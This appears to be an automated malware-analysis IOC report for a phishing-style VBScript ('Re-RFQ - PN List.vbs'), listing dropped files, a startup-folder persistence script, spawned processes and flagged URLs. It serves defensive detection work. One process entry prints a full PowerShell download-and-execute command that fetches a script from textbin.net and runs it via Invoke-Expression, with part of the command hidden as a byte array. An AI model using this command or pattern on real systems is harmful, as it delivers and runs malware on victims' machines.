IOC Report
Re-RFQ - PN List.vbs

loading gif

Files

File Path
Type
Category
Malicious
Re-RFQ - PN List.vbs
UTF-8 Unicode text, with very long lines, with CRLF line terminators
initial sample
malicious
C:\Users\Public\gia9ab2dg0.PS1
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs
C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, 61480 bytes, 1 file
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs
C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.out
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES14F3.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ce, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RESC9E1.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g4lgrl3.ws0.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bbucvlc.1j2.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1efweqf.5aa.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrik5clw.pjd.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzpdbdk.wsu.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t1u4d1.0tt.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.out
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
modified
C:\Users\user\Documents\20220516\PowerShell_transcript.841618.MEqVT+yD.20220516192930.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\Documents\20220516\PowerShell_transcript.841618.RBBMNgBb.20220516193001.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\Documents\20220516\PowerShell_transcript.841618.f5mU45le.20220516192941.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
There are 19 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://textbin.net/raw/gia9ab2dg0
148.72.177.212
malicious
https://textbin.net
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown